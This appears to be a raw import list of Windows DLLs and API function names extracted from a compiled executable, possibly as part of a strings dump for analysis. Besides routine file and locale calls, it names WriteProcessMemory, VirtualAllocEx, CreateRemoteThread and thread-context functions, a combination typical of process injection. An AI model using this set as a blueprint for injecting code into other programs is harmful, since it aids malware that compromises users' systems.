MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
RegOpenKeyA
kernel32.dll
WriteProcessMemory
WriteFile
WideCharToMultiByte
WaitForSingleObject
VirtualQuery
VirtualProtectEx
VirtualProtect
VirtualFree
VirtualAllocEx
VirtualAlloc
SystemTimeToFileTime
SizeofResource
SetThreadContext
SetLastError
SetFileTime
SetFilePointer
SetFileAttributesW
SetFileAttributesA
SetEvent
SetErrorMode
SetEndOfFile
SetCurrentDirectoryW
SetCurrentDirectoryA
ResetEvent
RemoveDirectoryW
RemoveDirectoryA
ReadProcessMemory
ReadFile
QueryDosDeviceW
PostQueuedCompletionStatus
MultiByteToWideChar
LockResource
LoadResource
LoadLibraryW
LoadLibraryA
LeaveCriticalSection
IsBadWritePtr
IsBadStringPtrW
IsBadReadPtr
InitializeCriticalSection
GetWindowsDirectoryW
GetWindowsDirectoryA
GetVersionExA
GetVersion
GetThreadLocale
GetThreadContext
GetTempPathW
GetTempPathA
GetTempFileNameW
GetTempFileNameA
GetSystemDirectoryW
GetSystemDirectoryA
GetStringTypeExW
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameW
GetModuleFileNameA
GetLogicalDriveStringsW
GetLocaleInfoW
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameW
GetFullPathNameA
GetFileSize
GetFileAttributesW
GetFileAttributesA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCurrentProcess
GetCurrentDirectoryW
GetCurrentDirectoryA
GetCPInfo
GetACP
FreeResource
FreeLibrary
FormatMessageA
FlushInstructionCache
FindResourceW
FindNextFileW
FindNextFileA
FindFirstFileW
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitProcess
EnumCalendarInfoA
EnterCriticalSection
DeleteFileW
DeleteFileA
DeleteCriticalSection
CreateRemoteThread
CreateFileW
CreateFileA
CreateEventA
CreateDirectoryW
CreateDirectoryA
CompareStringW
CompareStringA
CloseHandle
user32.dll
MessageBoxA
LoadStringA
GetSystemMetrics
CharUpperBuffW
CharUpperW
CharLowerBuffW
CharLowerW
CharNextA
CharLowerA
CharUpperA
CharToOemA
kernel32.dll
kernel32.dll
ActivateActCtx
CreateActCtxW
QueryDosDeviceW
ole32.dll
CreateStreamOnHGlobal
CoUninitialize
CoInitialize
oleaut32.dll
GetErrorInfo
SysFreeString
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
ntdll.dll
RtlInitUnicodeString
RtlFreeUnicodeString
RtlFormatCurrentUserKeyPath
RtlDosPathNameToNtPathName_U
SHFolder.dll
SHGetFolderPathW
SHGetFolderPathA
ntdll.dll
ZwProtectVirtualMemory
shlwapi.dll
PathMatchSpecW
ntdll.dll
LdrGetProcedureAddress
RtlFreeUnicodeString
RtlInitAnsiString
RtlAnsiStringToUnicodeString
